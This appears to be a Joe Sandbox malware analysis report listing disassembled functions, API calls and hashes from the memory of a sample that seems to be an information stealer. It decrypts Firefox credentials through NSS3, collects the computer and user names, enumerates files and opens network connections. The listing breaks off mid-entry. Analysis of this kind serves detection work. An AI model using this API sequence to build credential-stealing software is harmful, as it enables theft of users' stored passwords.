Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B190
lstrlen.KERNEL32(00000000), ref: 0040B1A4

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: 00a59568e6e8dee021ac523680588fe9d21208a39996b7a3fc61866b91fea596
Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
Opcode Fuzzy Hash: 00a59568e6e8dee021ac523680588fe9d21208a39996b7a3fc61866b91fea596
Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040A95A
lstrlen.KERNEL32(00000000), ref: 0040A96E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: d60d012d099394867fd0c3f982d7f580b869e45677e5243acd2df46991eb4bfd
Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
Opcode Fuzzy Hash: d60d012d099394867fd0c3f982d7f580b869e45677e5243acd2df46991eb4bfd
Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040AC1E
lstrlen.KERNEL32(00000000), ref: 0040AC32

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 55d8cf1ee5e3191f301125c61a170fc330e59dd08e6a8f50685c6e9e78580fbd
Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
Opcode Fuzzy Hash: 55d8cf1ee5e3191f301125c61a170fc330e59dd08e6a8f50685c6e9e78580fbd
Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412ABA
lstrcat.KERNEL32(?,042F85F0), ref: 00412AD8

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 1d26accb574f515a2d7fe8c0f6acd20ad4040f4671a96e47e9b6da3715607b39
Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
Opcode Fuzzy Hash: 1d26accb574f515a2d7fe8c0f6acd20ad4040f4671a96e47e9b6da3715607b39
Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
Opcode Fuzzy Hash: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,042F0928,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

ExitProcess.KERNEL32 ref: 00401186

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FF8

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6BBBE2F0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 466threadCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,6BBBE2A6), ref: 6BBBE35E
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6BBBE2A6), ref: 6BBBE386
GetCurrentThreadId.KERNEL32 ref: 6BBBE3E4
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6BBBE4AB
ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE4F5
GetCurrentThreadId.KERNEL32 ref: 6BBBE577
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE584
ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BBBE8A6

Part of subcall function 6BB7B7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6BB7B7CF
Part of subcall function 6BB7B7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6BB7B808

Part of subcall function 6BBCB800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6BBF0FB6,00000000,?,?,6BBBE69E), ref: 6BBCB830

memset.VCRUNTIME140(?,00000000,00000000), ref: 6BBBE6DA

Part of subcall function 6BBCB8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6BBCB916
Part of subcall function 6BBCB8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6BBCB94A

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BBBE864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BBBE883

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6BBBE826, 6BBBE850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6BBBE777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6BBBE722, 6BBBE750, 6BBBE7A2
MOZ_PROFILER_STARTUP, xrefs: 6BBBE5A1, 6BBBE5CC, 6BBBE5FF, 6BBBE62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6BBBE655

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 2698983630-53385798
Opcode ID: 49c3f48f5661636cbc08f1af294e75274f3f0e39959e6fa91f29cbfd1de61eb5
Instruction ID: c3e79778c7942e3453daa8d3173fc5522ac4ee1fe6f6df6f11fc466d32600f9a
Opcode Fuzzy Hash: 49c3f48f5661636cbc08f1af294e75274f3f0e39959e6fa91f29cbfd1de61eb5
Instruction Fuzzy Hash: 0402AC75A043859FCB14CF28C480A6EBBF9FF89304F04496CE95A9B351DB39E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 004121F0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
HeapAlloc.KERNEL32(00000000), ref: 00412207
wsprintfA.USER32 ref: 00412223
FindFirstFileA.KERNEL32(?,?), ref: 0041223A
StrCmpCA.SHLWAPI(?,0041D84C), ref: 00412268
StrCmpCA.SHLWAPI(?,0041D850), ref: 0041227E
FindNextFileA.KERNEL32(000000FF,?), ref: 004122FF
FindClose.KERNEL32(000000FF), ref: 00412314
lstrcat.KERNEL32(?,042F0A18), ref: 00412339
lstrcat.KERNEL32(?,042F76C0), ref: 0041234C
lstrlen.KERNEL32(?), ref: 00412359
lstrlen.KERNEL32(?), ref: 0041236A

Strings

%s\*, xrefs: 00412217
%s\%s, xrefs: 00412295

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 0a12d10b0853cdca75f850272d177170673b34ecfbac75b41269a42e2db7d2f4
Instruction ID: 68eafe57ffc654504e5fb8166b756e3a47007b1446461b295be9b39175aa6662
Opcode Fuzzy Hash: 0a12d10b0853cdca75f850272d177170673b34ecfbac75b41269a42e2db7d2f4
Instruction Fuzzy Hash: 5551A6B5940618ABCB20EBB0DC89FEE737DAB98300F404689F61A96150DF749BC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF90 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BFC3
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,042F0958), ref: 0040BFE1
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
memcpy.MSVCRT ref: 0040C082
lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
PK11_FreeSlot.NSS3(?), ref: 0040C0D1
lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
String ID:
API String ID: 3428224297-0
Opcode ID: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
Instruction ID: c615a08a89d19efff62b5a0e6981dcd2a682f0599fa2db432923c9597831d409
Opcode Fuzzy Hash: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
Instruction Fuzzy Hash: 22417E75D0420ADBDB20CF90DD88BEEBBB9BB48340F1041A9E605A72C0DB745A84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040D540 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

